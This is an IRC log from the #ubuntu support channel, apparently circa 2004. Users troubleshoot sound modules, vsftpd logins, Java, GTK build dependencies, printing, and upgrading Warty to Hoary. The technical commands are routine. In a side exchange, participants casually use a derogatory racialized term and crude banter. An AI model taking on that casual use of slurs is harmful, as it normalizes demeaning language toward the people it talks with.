Kirsch_That sucks...10:37
|trey|Kirsch, nope... minimum of 2...10:37
GnuHippyis there anything out there better than the gimp more like Photoshop?10:37
natea|trey|, well, it's not immediately obvious what the device is known as to Linux.10:37
lupus_kernel recompilation is not really an option10:37
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linux_mafiaGnuHippy, photoshop is more like photoshop10:37
lupus_I rather see the kernel in hoary using the inotify patch :)10:37
linux_mafialupus_, why not?10:37
GnuHippyCaptain Obvious10:37
|trey|GnuHippy, not really... inkscape is one interface, but nothing has the features of the GIMP10:38
lupus_since it will be in there in 6 months anyway10:38
GnuHippyinkscape is vector drawing10:38
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linux_mafialupus_, sweet, wait 6 months then, i want to try shit out "now" heh10:38
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|trey|natea, I dunno man, what was the conflict? I just saw the questions about how to blacklist  :(10:39
shaverstarting the hotplug subsystem takes a while10:39
lupus_linux_mafia, hoary is for trying shit out now :p10:39
shaverand it can't access my hardware clock, alas10:39
linux_mafialupus_, yeah, im using that too10:39
drakonimalright yall... im out.  peace!10:39
|trey|GnuHippy, I know, but yeah, I was mainly pointing at the single interface for it... nothing beats GIMP for me though, not even Photoshop...10:39
GnuHippyI can't use it10:40
GnuHippyit is too unintuitive10:40
lupus_it is already using some gnome 2.9 stuff :)10:40
natea|trey| the message in /var/log/messages is:10:40
natea pwc Failed to set LED on/off time.10:40
|trey|GnuHippy, tip: google "what_you_want_to_do gimp"10:40
natea drivers/usb/input/hid-input.c: event field not found10:40
GnuHippyyou can't do layer effects10:40
Cuga_GnuHippy, haha what a name :)10:41
Cuga_i like it10:41
Telep|trey|: my gf recommends you go jogging or get a fair trade banana ;)10:41
|trey|natea, sorry man, no idea  :(10:41
nateaok, thanks anyways.10:41
|trey|Telep, your gf just wants to follow me there  ;)10:41
=== zero [~zero@vickesh01-5883.tbaytel.net] has joined #ubuntu
linux_mafialupus_, i think it will take robert loves patch a while to get into the kernel proper10:42
|trey|Telep, I am pleanty in shape, and OPP's seem to like me a lot  :P10:42
zeroI love the distro, its like sex! Question, ive installed it and everything, but it was the root passwrd im entering is wrong... whats an easy way to change the root pass?10:42
lupus_linux_mafia, ubuntu does not use vanilla kernel :)10:42
Kal_Zakathzero : use the pass that you set for your user10:43
zeroyea its not working10:43
Kal_Zakathwhen does it occurs ?10:43
zulzero: sudo su -10:43
linux_mafialupus_, granted, but it seems only suse is putting out inotify kernels so far10:43
=== Jaramin [~p@modemcable183.164-200-24.mc.videotron.ca] has joined #ubuntu
ztonzyhow do one know if you have a firewall running on Ubuntu ?10:44
zerohmm it works with 'sudo su'10:44
zerobut not su10:44
|trey|Telep, me: http://www.facethejury.com/profile.asp?user_name=PiMpN (ignore the username though, gift, its a paid account for free)10:44
zerothanks :)10:45
epodfor installing java, with java-package from multiverse, do I want j2re or j2sdk? (I don't see jdk)10:45
lupus_linux_mafia, fedora 3 also I think since they are switching from fam to gamin10:45
|trey|Telep, looks more like me, you can't see it though: http://www.facethejury.com/images/photos/Pi/Pimpn-2061453.jpg10:45
epodack gotta go on-site10:45
linux_mafia|trey|, is that you?10:46
|trey|linux_mafia, yeah  :)10:46
Telep|trey|: ok :D10:46
linux_mafia|trey|, what a wigger ;)10:47
|trey|linux_mafia, hahahaha... you'd be surprised how much I hear that  ;)10:47
linux_mafia|trey|, me too10:47
Telep|trey|: my gf wants to know if that light is coming _through_ your ear?10:47
GnuHippyyou dont have a gf10:47
ztonzyanyone ?10:47
GnuHippyyou mean your right hand?10:47
linux_mafialight? probably got tunnel piercings10:47
shaverwhat's the ubuntu equivalent of chkconfig?10:47
shaverfor controlling service startup10:48
|trey|Telep, haha... thats a photoshop... the real version is below... its just to fit for with the 'PiMpN' name  :)10:48
linux_mafiashaver, not ubuntu, debian, update-rc.d10:48
JaraminI'm having problems with metacity, apt-get gives me "failed to open /etc/gconf/schemas/metacity.schemas". I checked, and the file isn't there. How do I get this file, from what package does it usually come from?10:48
shaverthere is no debian, only ubuntu10:48
|trey|shaver, imo, that may not be far from the truth in a few years  :)10:49
mjrwell, that's true for me now, with amd64 :P10:49
shaverupdate-rc.d doesn't list the known services10:49
shavermjr: ditto10:49
seb128Jaramin: you can probably find it in /usr/share/gconf/schemas/metacity.schemas10:49
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|trey|shaver, apt-get install rcconf or Computer > System Configuration > Services.10:50
mjr(still, I don't think Debian's going anywhere, and neither should it)10:50
Jaraminshaver: k, I'll check10:50
shaver|trey|: I don't have > Services there10:50
linux_mafia|trey|, check my wigger styles, more "intelligent thug" type shit: http://homepages.paradise.net.nz/maxb10:50
shaver|trey|: that's what I looked for =/10:50
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shaver|trey|: what package is that?10:50
|trey|mjr, I dunno, all the drama right now to do with a release...10:50
=== FreddyF [~zero@vickesh01-5883.tbaytel.net] has joined #ubuntu
FreddyFis it true there is no alsaconf in ubuntu?10:50
Strisshey guys...I'm running Ubuntu PPC and I installed Java from the Synaptic Package Manager with the free-java-sdk package, how do I get java to work inside Firefox now?10:51
|trey|shaver, is what?10:51
shaver|trey|: the > Services tool10:51
mjrStriss, you pretty much don't with that10:51
|trey|linux_mafia, haha.. you definatly fit the mafia look well  ;)10:51
|trey|shaver, gnome-system-tools10:51
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Strissmjr, oh...is there any way I can get java working inside firefox on ppc?10:51
mjrStriss, the free Java stuff isn't up to running applets10:51
FreddyFhow do i get my sound working if there is no alsaconf?10:52
mjr(at least those requireing GUIs ;)10:52
shavergnome-system-tools is already the newest version.10:52
Strissi see...so is there any solution for me?10:52
bratscheIs there any idea when an updated Firefox package will be released for Ubuntu?  The 0.9.3 package is almost unusable.10:52
shaverbratsche: with Hoary10:52
shaverbratsche: though I think I'll rebuild with 1.0 on the 9th10:52
bratscheIs there an estimated release date?10:52
shaveronce I figure out how to do that10:52
StrissIs there a guide available on how to upgrade Warty to Hoary?10:52
|trey|Striss, You can use java-package to package sun's java... or blackdown java... or pay www.apt-get.org a visit and get a premade .deb  :)10:52
GnuHippywhen will hoary be stable enough for everyday use?10:53
Striss|trey|, ok thanks10:53
Cuga_bratsche, how is .9.3 unuable?10:53
|trey|Striss, heres the guide: change 'warty' in sources.list to 'hoary', sudo apt-get update && sudo apt-get dist-upgrade10:53
bratscheCuga_: It crashes almost every time I try to type into a text entry.  For example, the Google bar at the top.  Or when I go to the actual Google page and try to type into the text entry.10:53
|trey|I don't recommend you do it though, or something  :)10:53
Striss|trey|, ah easy enuf, thankyou10:53
FreddyFso... how do i get my sound to work....? there seems to be no alsaconf10:53
Cuga_thats not a problem with firefox, theres something wrong on your machine then10:54
Strissyeah i know I shouldn't do it...everything is working fine in Warty...but i just have that horrible urge to upgrade upgrade upgrade10:54
bratscheI've found that if I go to www.google.com and click outside the text box to remove the focus, then click back into it and type, I have a much higher chance of Firefox not crashing.  But it still does sometimes then.10:54
Strissis anybody here actually using Hoary?10:54
shaverthat's a bug fixed post 1.0RC10:54
GnuHippyor sudo alsaconf10:54
|trey|Striss, *cough*Iam*cough*10:54
bratscheCuga_: I'm using the default Ubuntu on amd64.10:54
Strissthat's enuf for me10:54
Cuga_i have no issues at all with firefox 0.9.3 with tons of extensions, only thing i dont like about .9.x is the broken updater10:54
Strissguess I'm gonna try it out10:54
TelepStriss: I am10:55
FreddyF/usr/sbin/alsaconf <- no such file/dir10:55
bratscheSo possibly it has to do with the amd64 build of it?10:55
|trey|Striss, I'd wait now till Xorg gets in... will be only a few days..10:55
shaverbratsche: yeah, 0.9.3 had lots of amd64 badness =/10:55
bratscheshaver: Oh, okay.  That's fixed in later releases?10:55
|trey|Striss, I upgraded to hoary last weekend... Xorg will apparently be painful for a while though...10:55
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Cuga_bratsche, yeah shaver is right, i remember reading bout some of those problems, sorry I didn't know you were on 6410:56
shaverbratsche: yeah, a lot of amd64 stuff is better in 1.0RC and upcoming 1.010:56
bratschecuga_: I didn't bother to tell you originally.  I didn't realize at first that it may be the problem. =)10:56
bratscheshaver: Okay, cool enough.  I'll shut up and wait for the next release then. =)10:56
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levanyone running vsftpd here?10:56
bratscheThe only other thing bothering me is that I can't seem to get Evolution/spamd to filter my spam.10:57
Strissshould I close all my apps that are open while i do this update?10:57
bratscheBut someone said that's a common problem right now too.10:57
|trey|Striss, not important...10:57
levi have a set of users that can login and a set that can't -- I'm having trouble figuring out why vsftpd is discriminating between the two sets...10:57
|trey|Striss, definatly advice restarting when its done though  ;)10:57
Strissi hope i don't regret this in about 20 minutes10:58
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FreddyFanyone? how do i get my sound working10:58
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Cuga_lev, check what groups that the users that can log in are a part of and see if the ones who can't might be excluded from like a 'ftpers' group ... be a good place to start, not sure thos10:58
shaverI wonder why I don't have system-tools services stuff working here10:58
|trey|Striss, I haven't had any issues that weren't self inflicted, so you should be fine  :)10:58
Strisshehe ok10:58
|trey|Striss, ahh, other then Evolution... its horribly broken... just to let you know...10:59
StrissI don't use Evolution so that's ok10:59
=== |trey| doesn't really use that though... gmail...
levCuga_: can you suggest where to look for that? I've checked /etc/ftpusers and /etc/vsftpd.conf...10:59
Strisswow I'm getting 500kbs from apt, excellent10:59
Strissthe upgrade is in the process now10:59
levCuga_: /etc/pam.d/vsftpd refers back to /etc/ftpusers, too...10:59
GnuHippywhat are you upgrading to striss?10:59
FreddyFHow do I get my sound working?10:59
GnuHippygood luck with that11:00
Strissi'm on PPC, hope all goes well11:00
GnuHippybe prepared to reformat11:00
|trey|Striss, If I don't get that, I am disappointed... I've been spoiled by Debian servers  :)11:00
shaver|trey|: what program is run by computer->system tools->services?11:00
shaver|trey|: can you check for me?11:00
StrissGnuHippy, why do you say that?11:00
Cuga_lev, i'd cat /etc/group and look at the groups that users that can login fin, and those who can't see if you see a pattern11:00
shaverI have gnome-system-tools installed, but nothing in the menus11:00
shaverabout Services11:00
shaverthough, hmm11:00
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GnuHippyI have tried it twice in the past week and have had nothing but problems11:00
paulproteuslev: Check also for an /etc/vsftpd.conf .  And/or read its man page. ;)11:00
wannesshaver: boot-admin11:00
GnuHippythere are a ton of bugs11:00
|trey|shaver, says "gksudo services-admin"... could be new to GNOME 2.9 though?11:01
wannes"gksudo boot-admin" actually11:01
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StrissGnuHippy, really? any major ones?11:01
=== FreddyF asks again.... if there is no alsaconf, what do i do to get my sound working
shaver|trey|: oh, are you not on warty?11:01
GnuHippySynaptic doesn't work11:01
levpaulproteus: I read the man for that -- I've read the file, too. :-)11:01
|trey|shaver, nope... hoary..11:01
Strisswell, i barely ever use synaptic11:01
Cuga_FreddyF, what sound card do you have?11:01
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|trey|GnuHippy, I just used Synaptic?11:01
levCuga_: the entries in /etc/group look quite similar -- no significant difference.11:01
Telephmm, Synaptic's working fine with me on Hoary11:01
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StrissOk I have a question...I'm upgrading to Hoary now, when it becomes stable, will I be able to upgrade to that?11:02
Strissor will i be stuck with unstable hoary11:02
Cuga_lev, do this test, create a new user now, and see if it can ftp in11:02
GnuHippyit must be fixed now because synaptic would quit on me when I tried to install anything with dependancies11:02
|trey|Striss, as they stabalize it, you will just get new packages when you dist-upgrade...11:02
Strisslinux kicks ass11:02
FreddyF             description: Multimedia audio controller11:02
FreddyF             product: VT8233/A/8235/8237 AC97 Audio Controller11:02
FreddyF             vendor: VIA Technologies, Inc.11:02
|trey|Striss, will be simular to Warty, I upgraded like 3 packages the day it was released  :)11:02
levCuga_: hang on...thanks for the help, btw...11:02
Cuga_lev, np11:03
mvo_GnuHippy: this problem is fixed11:03
StrissI compiled MPlayer a few days ago myself, will this upgrade mess up anything with those mplayer binaries?11:03
vinc1Anyone have any luck wth an ipod mini?11:03
StrissI have too many questions I think11:03
Cuga_FreddyF, Well thats about the most common onboard card out there... you say you dont have any alsa stuff.. why don't you install alsa-base and alsa-utils ?11:03
GnuHippyare there any other big bugs I should know about11:03
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GnuHippyI think I want to go back11:03
|trey|Striss, it shouldn't... you put them in /usr/local/ right?11:03
FreddyFyea, i login as root and type alsaconf... doesent work11:03
Matt|vinc1, i use an ipod mini11:03
levCuga_: nope, new user ftptest can't login...my maintenance account doesn't have a problem though.11:03
|trey|Striss, apt ignores /usr/local  ;)11:03
nesman89question:  connecting through nautilus to windows network.  i can see all the computers in the network however when i try to access shares on the computer i get an "access denied you don't have permissions error"  anybody else seen this and if so any ideas.  or is it a fix in a future issue11:04
StrissI was so suprised how much better MPlayer performs in ubuntu than it did in OS X11:04
FreddyFso.. apt-get install alsa-base and apt-get install alsa-utils?11:04
Strissi was very pleased11:04
Cuga_FreddyF, yep11:04
Cuga_FreddyF, also, are you running a stock kernel? or custom?11:04
|trey|FreddyF, umm, you can just apt-get install alsa-utils... it will drag alsa-base with it  ;)11:04
levCuga_: do I need to restart the ftp server so it knows users created since it executed? that would be odd...but the only difference between the two groups is that stsunx existed before i started vsftpd11:04
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FreddyFthe default ubuntu came with11:04
Cuga_lev, then there must be a list of 'allowd' users somewhere if you didn't notice anything odd lookign in /etc/groups11:05
|trey|FreddyF, uname -r to sound smart  ;)11:05
levCuga_: that's what i'd think, but i've checked all the ones i know...11:05
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Cuga_lev, worth a shot, but I can't see that working, sec, im gonna install it here and take a peak, i only use sftp on my servers11:05
FreddyFReading Package Lists... Done11:05
FreddyFBuilding Dependency Tree... Done11:05
FreddyFalsa-utils is already the newest version.11:05
FreddyF0 upgraded, 0 newly installed, 0 to remove and 4 not upgraded.11:05
FreddyFIt still says no fbad command when i type alsaconf11:06
levCuga_: i avoid ftp in general -- we need a regular old ftp set up here at work to distribute class files. i'd love to just use ssh...i know that a lot better... :-)11:06
|trey|FreddyF, sudo apt-get dist-upgrade to get the packages 'not upgraded'11:06
Cuga_tryed sudo alsaconf ?11:06
HrdwrBoBubuntu doesn't ship with alsaconf11:06
HrdwrBoBbecause it breaks ubuntu11:06
HrdwrBoBby default11:06
|trey|dpkg-reconfigure alsaconf11:06
Cuga_HrdwrBoB, really, thats good to know, thanks11:07
nesman89any ideas on windows networking issue?11:07
|trey|HrdwrBoB, afaik, early adopters still got it... was removed from archive during Warty release... never had anything conflict with it though...11:07
Cuga_lev, when you installed vsftp, did it give you the option of using mysql stored accounts?11:07
FreddyFSetting up lvm10 (1.0.8-4ubuntu1.1) ...11:08
FreddyF  No volume groups found11:08
FreddyFthat does not sound good11:08
|trey|FreddyF, its fine... Ubuntu doesn't set up lvm by default11:08
Strissi guess I should go reboot my system and see if Hoary will play nice with my mac11:08
Strissi'll be back to let you guys know how it goes...i hope11:08
|trey|Striss, :)11:08
FreddyFwelll i ran apt-get dist-upgrade and alsaconf still does not work11:08
|trey|FreddyF, they removed it from the archive....11:09
|trey|FreddyF, you can remove it if you want... its useless...11:09
levCuga_: gee...I really don't remember.11:09
FreddyFwell, I figured i need to run alsaconf to get my sound working11:09
FreddyFhow else can i get sound working11:09
|trey|FreddyF, nope... you just need to know what module you need... and make sure its not muted  :)11:10
levCuga_: i'm pretty sure my vsftpd isn't set up like that, but i'm not certain11:10
|trey|FreddyF, lspci and tell me what it says your audio device is...11:11
Cuga_lev, you've looked in vsftpd.ftpusers right ?11:11
FreddyF0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50)11:11
|trey|FreddyF, also, just for kicks... Computer > System Configuration > Devices... see if its loaded...11:12
|trey|FreddyF, ahh, same as me  :)11:12
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|trey|FreddyF, I load via82xx and ac97 and it works  :)11:12
FreddyFwhy wont mine work heh!11:13
levCuga_: oh my. i do apologize -- no, I didn't. i looked in /etc/ftpusers and at the pam entry...i don't remember there being a vsftpd-specific user file. but I guess there is.11:13
|trey|FreddyF, you have ac97 loaded?11:13
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|trey|FreddyF, lsmod | grep ac9711:13
levCuga_: thanks for the trouble -- i feel silly that it was such a trivial answer.11:13
FreddyFI havent a clue11:13
|trey|FreddyF, lsmod | grep ac97  <-- if that doesn't show you anything, answer = no11:13
Kal_Zakathgnaite all11:14
FreddyFroot@obscurity:/home/zero # lsmod | grep ac9711:14
FreddyFsnd_ac97_codec         59268  1 snd_via82xx11:14
FreddyFsnd                    50660  11 snd_via82xx,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device11:14
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Cuga_lev, np :)11:14
HrdwrBoBlev: trivial answers are good11:14
|trey|FreddyF, if no; then modprobe ac97 && echo ac97 >> /etc/modules11:14
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FreddyFso i should run modprobe ac97 && echo ac97 >> /etc/modules right now?11:14
|trey|FreddyF, try it, yeah...11:15
levHrdwrBoB: yeah -- i'm glad this takes care of it. the more i feel like an idiot, the more i learn about computers, i find. thanks for all your help.11:15
|trey|FreddyF, its the only thing I ever have to do to get sound working...11:15
=== Nigelenki [~bluefox@pcp485126pcs.whtmrs01.md.comcast.net] has joined #ubuntu
FreddyFthanks man11:15
|trey|FreddyF, yw  :)11:15
Cuga_lev, story of my life haha, i'm always looking for bigger issues then are acktually at hand.. burned me a few times haha11:15
FreddyFyou guys are great, keep up the good work11:15
|trey|Cuga_, breaking things makes computing more fun imo  ;)11:16
[Phaedrus] you are a strange one |trey|11:16
[Phaedrus] :)11:16
|trey|[Phaedrus] , ahha... seriously though, computers bore me when everything works  :(11:16
|trey|I have to like, play games or something *shudder*11:17
[Phaedrus] tell me again, where do you work?11:17
|trey|[Phaedrus] , studying Network Technology right now... not working...11:17
[Phaedrus] well, that explains a fair bit11:17
|trey|2 classes (so 10 weeks) from my Assosiates  :)11:17
[Phaedrus] you are "involved" with computers11:18
=== nightlybuild [~john_leje@ACaen-251-2-1-158.w83-115.abo.wanadoo.fr] has joined #ubuntu
|trey|[Phaedrus] , yup yup... I am like the resident "Linux Guy"... pretty funny when the Linux Admin instructor asks you for help   ;)11:18
nightlybuildhello Ubuntu world !11:18
|trey|[Phaedrus] , switched one Linux instructor to Debian too prior to Ubuntu being released11:19
|trey|Was a Gentoo user *shudder*11:19
|trey|nightlybuild, hey  :)11:20
[Phaedrus] gentoo is nice... its made for people like you11:20
[Phaedrus] my roommate and best friend uses gentoo... i havent yet seen him use his computer11:20
vinc1gentoo is nice, but time consuming11:20
[Phaedrus] for the past year or so, there is always something compiling, something being fixed11:20
vinc1I actually used my gentoo11:21
|trey|[Phaedrus] , I resent that... renders my system fairly useless though... compiling all the time kinda takes away from the speed advantages...11:21
vinc1you don't have to compile all the time11:21
[Phaedrus] well, he has a notebook and a desktop11:21
[Phaedrus] vinc1, my roomate was on the "bleeding edge"11:21
=== |trey| only has a lowly 950 Duron... 500 mb RAM but still, Gentoo wasn't so kind on this hardware...
[Phaedrus] always trying out new things, trying to encrypt his hard-drive and stuff11:22
=== beezly [~andy@monkey.beezly.org.uk] has joined #ubuntu
[Phaedrus] i can safely say, there was no rest for his system11:22
|trey|[Phaedrus] , I'm constantly apt-cache search'ing for things to play with...11:22
vinc1ther'es no rest for mine ever11:23
=== MyKq3 [~MyKq3@] has joined #ubuntu
=== limaunion [~limaunion@172-166-114-200.fibertel.com.ar] has joined #ubuntu
[Phaedrus] |trey|,why dont you put your time into programming?11:25
MyKq3hello can i install kde with out makeing all the kde programs the defult programs on Gnome ?11:25
|trey|[Phaedrus] , I want to, but no time to learn  :(11:25
HrdwrBoBMyKq3: yes that's the default11:25
HrdwrBoBwhen you install kde it's just there11:25
|trey|[Phaedrus] , I definatly plan on learning at least C# once I get out of school though...11:26
=== noneus [~noneus@pD950F65C.dip.t-dialin.net] has joined #ubuntu
limaunionhi can someone tell me how can i do to 'auto-mount' smb filesystems? I've already added them to my fstab, but they aren't mounted while booting.11:26
HrdwrBoB|trey|: teach yourself python or perl or php or something11:26
HrdwrBoBti's not hard11:26
|trey|(just cuz it looks useful and fairly easy... due to Ubuntu's stance on Python, I am also looking at that though..)11:27
MyKq3HrdwrBoB,  the last time i installed kde after i  installed gnome it made all the kde programs the default ( e.g. when i trye to open a txt file it opend it with kedit  instad of gedit11:27
rebirthback :)11:27
HrdwrBoBMyKq3: oh... that's Bad[tm] 11:27
|trey|HrdwrBoB, C# has a much larger usage base though... .NET and Mono (GTK#, Qt#, Cocoa#)... so thats why I am learning towards that...11:28
HrdwrBoB|trey|: don't learn a language11:28
HrdwrBoBlearn the concepts11:28
HrdwrBoBa good coder can learna new language in less than a few days11:29
|trey|HrdwrBoB, what better way to learn the concepts then to actual learn some though?11:29
HrdwrBoBit's a matter of mapping the same concepts to new semantics11:29
HrdwrBoB|trey|: precisely11:29
HrdwrBoBbut my point is, don't get too hung up on the language11:29
HrdwrBoBpython is a good start, esp because it'll teach you OO right from the start11:30
HrdwrBoBand it's damn easy to uyse11:30
HrdwrBoBperl, while I like it and use it daily, is somewhat more.. finnicky11:30
=== lupus_ [~lupus@kn-ivl-2.kuleuven.net] has joined #ubuntu
|trey|HrdwrBoB, even more so with EssentialPython :)11:30
|trey|HrdwrBoB, yeah, thats why I haven't given that any serious consideration yet...11:31
|trey|Perl code just looks uglier then Python code too 9 times out of 10...11:31
=== zzzzz [~zzzzzz@vickesh01-5883.tbaytel.net] has joined #ubuntu
HrdwrBoBtrue, though when I'm text munging I can get a lot more out of perl very easily11:32
zzzzzwhy isnt gtk installed with ubuntu?11:32
|trey|zzzzz, you mean 1.2? because its not required...11:32
|trey|zzzzz, dpkg -l libgtk-2.0 | grep ^ii11:32
zzzzzrefuses to compile gaim 1.0.211:33
zzzzz*** GLib 2.0 is required to build Gaim; please make sure you have the GLib11:33
zzzzz*** development headers installed. The latest version of GLib is11:33
zzzzz*** always available at http://www.gtk.org/.11:33
HrdwrBoBzzzzz: you will need the dev module :)11:33
=== aardvark [~aardvark@outbound.gettyimages.com] has joined #ubuntu
|trey|zzzzz, need libgtk-2.0-dev11:33
HrdwrBoBsudo apt-get install glib2.0-dev11:33
=== nomasteryoda [~tux@ip24-252-193-86.mc.at.cox.net] has joined #ubuntu
zzzzzNo packages found matching libgtk-2.0.11:33
HrdwrBoBer libglib-dev11:33
|trey|uhhh, and what HrdwrBoB just said  :)11:34
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HrdwrBoBthat one11:34
epodif I install k3b, will it show up in my gnome menu?11:34
|trey|zzzzz, ahh, then get rid of the -  :)11:34
=== HrdwrBoB stops guessing and starts using reality
HrdwrBoBepod: I don't beleive so11:34
epoder, install it with synaptic, that is11:34
|trey|HrdwrBoB, umm, hey, yeah, Gaim 1.0.2 = gtk 2.x  ;)11:34
|trey|HrdwrBoB, you just told him to get old glib... :(11:35
HrdwrBoB|trey|: glib is only at version 1.211:35
HrdwrBoBI such11:35
=== agsansoo [~rup@adsl-66-126-101-98.dsl.lsan03.pacbell.net] has joined #ubuntu
zzzzzso if i apt-get libglib1.2-dev I should be able to compile gaim without problems?11:35
HrdwrBoBapt-cache is being arse11:35
HrdwrBoBlibglib2.0-dev - Development files for the GLib library11:35
HrdwrBoBzzzzz: ok, run this command sudo apt-get install libglib2.0-dev libgtk2.0-dev11:35
zzzzzThanks =)11:36
|trey|HrdwrBoB, told ya so, or something  ;)11:37
=== |trey| thinks the gtk packages should maybe be renamed though... I never remember what they are called... :(
=== GnuHippy [~jason@blk-222-217-193.eastlink.ca] has joined #ubuntu
|trey|libgtk2.0-0 is not very obvious  :(11:39
GnuHippywow hoary has improved 10 fold11:39
|trey|should be just libgtk211:39
GnuHippyI just did an apt-get upgrade11:39
GnuHippyto hoary11:39
zzzzzi love you guys11:39
GnuHippyeverything works11:39
|trey|GnuHippy, I haven't noticed *that* much... which is actually prolly a good thing  :)11:39
zzzzzbest distro ive used, and ive used over 911:39
=== vinc1 counts up his distros
=== |trey| lost count at 30 something :o
GnuHippyI have used almost ever distro known to man11:40
GnuHippyevery modern day os known to man11:40
vinc1red hat for a day, suse for 2 days11:40
vinc1then gentoo for months11:40
vinc1vidalinux for 2 weeks11:40
|trey|Then, only about 7 or 8 have lasted the night though...11:40
vinc1now ubuntu for a couple of days11:40
GnuHippyVida is horrid11:40
vinc1vida wasn't bad11:40
GnuHippyred hat and mandrake suck now11:41
vinc1they sucked before11:41
GnuHippygentoo is for people who have no lives11:41
vinc1I don't really11:41
=== agsansoo [~rup@adsl-66-126-101-98.dsl.lsan03.pacbell.net] has left #ubuntu ["Leaving"]
nosilver4uor for people who actually want to learn about their computers11:41
GnuHippyDebian is nice but only sid11:41
=== ultrafunk [~pd@eth779.vic.adsl.internode.on.net] has joined #ubuntu
|trey|GnuHippy, not even that... its for people that can't think of anything else to waste clock cycles on  ;)11:41
nosilver4uinstead of just use them11:41
GnuHippyhey I used gentoo for longest while and I learned more using "handholding" distros than I did with Gentoo11:42
vinc1Gentoo shocks you into it11:42
topylivinc1: what is vida all about? never heard11:42
|trey|nosilver4u, I used Gentoo, only thing I learned was that compiling everything takes too fucking long!!11:42
GnuHippygentoo was just following a guide and reporting to forums when things fucked up11:42
GnuHippywhich they did11:42
GnuHippyeven in a stage 3 install11:42
GnuHippygenkernel is terrible11:42
vinc1vidalinux is basically a stage3 gentoo install using anaconda that preconfigures the gui and has a frontend for portage11:43
|trey|First time I installed Gentoo... I installed a stage 3, then still did everything for stage 1... fun stuff...11:43
defendguinhey im trying to print to a cups networked printer but it says the device is busy but it isnt what can i do i really need to print something11:43
vinc1I started with stage1..11:43
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=== vinc1 shall return
|trey|defendguin, what kind of Printer?11:43
defendguinHP deskjet11:44
|trey|defendguin, you been to http://www.linuxprinting.org/ recently?11:44
topylivinc1: gentoo for newbies?11:44
Hikaru79I have the same problem11:44
Hikaru79So if you help defendguin, you're helping too :D11:44
epodok, java is installed, I can play DVD's, my palm pilot works, wifi works, sound words, cardreader works, ati drivers work, umm.11:44
|trey|defendguin, ahh, I swear HP's hardware is supposed to just work... IPP is supposed to not require software configuration  :(11:44
epodcrap ubuntu has left me with nothing to do!11:44
|trey|CUPS supports IPP afaik  :(11:45
defendguin|trey|, it was working11:45
|trey|epod, ikr... damn them for not breaking enough packages to keep me busy  :)11:45
=== jcole [~jcole@atlwebproxy3.core.hp.com] has joined #ubuntu
defendguini dont know what happened all of a sudden it says its busy11:45
defendguinbut it isnt printing anything11:45
|trey|defendguin, I don't have a printer here... so not very familier with CUPS, sorry  :(11:45
=== rcaskey__ [~rcaskey@cai17.music.uga.edu] has joined #ubuntu
epod|trey|, totally :)  Now i need GAMES! GAMESSS!11:46
Hikaru79My problem involves the fact that the printer is connected to a Windows network11:46
|trey|epod, BZFlag should be supported *nods*11:46
Hikaru79I can see the windows network fine11:46
Hikaru79But not the printer >>11:46
Hikaru79Any ideas?11:46
|trey|That game is addicting  :)11:46
=== vinc1 whistles
=== shevegen [~mughel@chello080108103172.36.11.univie.teleweb.at] has joined #ubuntu
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shevegenQuestion to make sure:  Ubuntu does not come with gcc ? Cant seem to find one.11:47
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bob2mdz: i know...is it at the stage where you want wide testing from non-developers, tho?11:47
|trey|shevegen, apt-get install build-essential11:47
epodThis is so weird.  ALSA seems to think my headphone volume setting controls my speakers.11:47
bob2shevegen: of course it does, install build-essential11:47
mdzbob2: adventurous ones, yes :-)11:47
=== zenwhen [1001@host-66-20-101-189.bgk.bellsouth.net] has joined #ubuntu
bob2mdz: hah, ok11:47
|trey|mdz, *cough* *cough*11:47
Tsjoklatmorn all11:48
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|trey|mdz, expect I didn't see what ya'll are talking about  :(11:48
Hikaru79But I get this error on the printer property page when I try to print a test page: Printing: Connection failed with error NT_STATUS_UNSUCCESSFUL11:48
mdzbob2: the text at http://lists.ubuntu.com/archives/ubuntu-announce/2004-October/000005.html sums it up clearly11:48
mdz|trey|: hoary11:48
shevegenbob2: true, works like a charm, thanks :)11:48
|trey|mdz, damnit, I've been running hoary for like a week...  ;)11:49
|trey|mdz, sup @ you all not giving me any bugs to report?  :(11:49
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cleedaniels: you're a bastard11:49
defendguinthis blows that at my hour of need printing fails11:50
shevegenthx for the help, laters guys11:50
=== shevegen [~mughel@chello080108103172.36.11.univie.teleweb.at] has left #ubuntu ["Verlassend"]
mdz|trey|: the word of the day is "features", rather than bugs.  bugs are for freeze time :-)11:50
|trey|defendguin, sorry man... wish I could help more  :(11:50
Hikaru79defendguin, let's both complain about our printers at once and maybe someone will take mercy on us ><11:50
Hikaru79Mine's more of a network problem though11:50
defendguinPrinting: Network host '' is busy; will retry in 30 seconds...INFO: Connecting to on port 631...11:50
Hikaru79Since I'm sure if it could actually find the printer over the network it woudl be fine11:50
Hikaru79Since it's one of the "supported" models11:50
defendguinipp://   this worked for me11:51
defendguinthe printer is connected to a fedora box11:51
topyli|trey|: the amount of hoary bugs is indeed so low it worries me :)11:51
|trey|mdz, I've been poking around looking for features... only thing thats annoyed me so far (other then polypaudio not being ready) is gaim's text format bar being greyed... thats fixed in 1.0.2 though, so now I am left with no fun  :(11:51
GnuHippyindeed hoary is amazing11:51
=== zzzzz [~zzzzzz@vickesh01-5883.tbaytel.net] has joined #ubuntu
GnuHippyand it was released only a week ago11:51
linux_mafia|trey|, install beagle i tell you11:52
epodhoary is done?11:52
=== epod is on warty
=== Striss [~Strain@blk-222-170-205.eastlink.ca] has joined #ubuntu
GnuHippynot done11:52
Strisswoohoo, Hoary is working good11:52
epodOh ok good11:52
zzzzzI apologize for my idiocy... but i compiled gaim 1.0.2 and it yells at me about ssl... so i go to the gami site, check the faq and I check out the debian release, I download libgnutls11-dev.deb and try to run it but it fails11:52
GnuHippybut you can test it11:52
AcridienStriss: marvellous11:52
epodI want to stick to stable11:52
GnuHippyand it works fantastic11:52
|trey|linux_mafia, haha... I probably will... don't need any new things to worry about before Friday though  :)11:52
|trey|linux_mafia, I have 2 finals in the next 2 days... so yeah  :)11:52
Strissno problems with any of my main apps so far11:52
linux_mafia|trey|, finals of what?11:53
GnuHippyflunk them11:53
GnuHippyLinux is more important11:53
|trey|linux_mafia, NT Admin final lab and final test...11:53
topyliepod: compare your warty and the warty objectives at the wiki. they don't match yet :)11:53
|trey|linux_mafia, fun stuff... pulling a low A right now though, so I should be fine  :)11:53
aitrusNT Admin??? what more do you have to know besides ctrl+alt+del??11:53
topyliepod: not warty damn it, hoary :)11:53
